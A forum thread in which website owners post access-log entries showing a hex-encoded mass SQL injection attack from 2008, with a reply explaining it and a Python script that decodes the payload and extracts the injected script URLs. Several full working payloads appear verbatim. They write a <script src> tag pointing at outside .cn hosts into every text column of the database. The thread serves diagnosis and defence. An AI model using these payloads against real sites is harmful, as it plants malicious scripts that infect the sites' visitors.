Posted (edited)

I was going through my error logs and noticed some alerts so I downloaded my raw log. I found the following entries (there were more but I'll only post one full and one truncated). So I'm guessing there is an exploit in an old version of either PHP or Apache but can anyone shed any light on it? I have blocked the 2 main IPs using htaccess for now.

 

ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343

<snip>

C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

Edited by carbonize
Posted

This is a common form of SQL injection and is not really related to Apache or PHP. This can be accomplished in any scripting language if the script is not validating user input. This particular attack is attempting to insert code that allows an external script to load in a frame on the site, which is then used for things like redirecting the visitor or infecting their machine.

 

If you convert everything in parentheses for CAST from hex to ASCII, you can see the SQL query used. This will give you some idea of what they were attempting and whether it affected your database.

 

We will take this information and add the appropriate rules to our servers to help prevent these attacks.
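The hex-to-ASCII step described in the reply above, as an added example (not code from the thread or from the hosting provider): it takes the first log entry quoted in the opening post, pulls the CAST(0x...) blob out of the request line, decodes it, and reports the script URL the statement would append to every text column, plus whether the syntax is T-SQL (sysobjects, syscolumns and @@FETCH_STATUS only exist on Microsoft SQL Server, so the statement cannot run against a MySQL backend). The regular expressions and the marker list are my own assumptions, and the user-agent string is shortened.

```python
import re
from urllib.parse import unquote

# Hex blob from the first log entry quoted in the thread, rejoined from its wrapped lines.
PAYLOAD_HEX = (
    '4445434C415245204054207661726368617228323535292C4043207661726368617228343'
    '0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656374'
    '20612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73'
    '206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78'
    '747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78'
    '747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D'
    '20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F535441'
    '5455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40'
    '432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31'
    '303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B4043'
    '2B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372'
    '697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A7322'
    '3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F4375'
    '72736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C'
    '4C4F43415445205461626C655F437572736F72')
# The same entry as an Apache combined-log line (only the user-agent string is shortened).
LOG_LINE = ('ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?;'
            'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x' + PAYLOAD_HEX + '%20AS%20CHAR(4000));EXEC(@S); '
            'HTTP/1.1" 200 9659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"')
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
CAST_RE = re.compile(r'CAST\(0x([0-9A-F]+) AS N?(?:VAR)?CHAR\(\d+\)\)', re.IGNORECASE)
SCRIPT_RE = re.compile(r'<script\s+src="([^"]+)"', re.IGNORECASE)
TSQL_MARKERS = ('sysobjects', 'syscolumns', '@@fetch_status')   # only meaningful on MS SQL Server

def decode_cast_payload(line):
    """Decode the CAST(0x... AS CHAR) blob in one access-log line; None if there is none.
    Returns the SQL, the <script src> URLs it writes into the database, and a T-SQL flag."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None
    target = unquote(m.group('target'))               # %20 -> space before matching
    hexes = CAST_RE.findall(target)
    if not hexes:
        return None
    sql = bytes.fromhex(hexes[0]).decode('latin-1')   # one byte per char, never raises
    return {
        'sql': sql,
        'script_urls': sorted(set(SCRIPT_RE.findall(sql))),
        'tsql': any(tok in sql.lower() for tok in TSQL_MARKERS),
    }

if __name__ == '__main__':
    result = decode_cast_payload(LOG_LINE)
    print(result['sql'], '\ninjected script(s):', result['script_urls'], '\nT-SQL:', result['tsql'])
```

The decoded string is what to search for in your own tables if the site does sit on SQL Server: the statement walks every user table and text column and prepends the script tag to each value not already carrying it.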

  • 1 month later...
Posted (edited)

I'm getting these as well.

 

http://atmospheresinking.com/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Edited by atmospheresinking
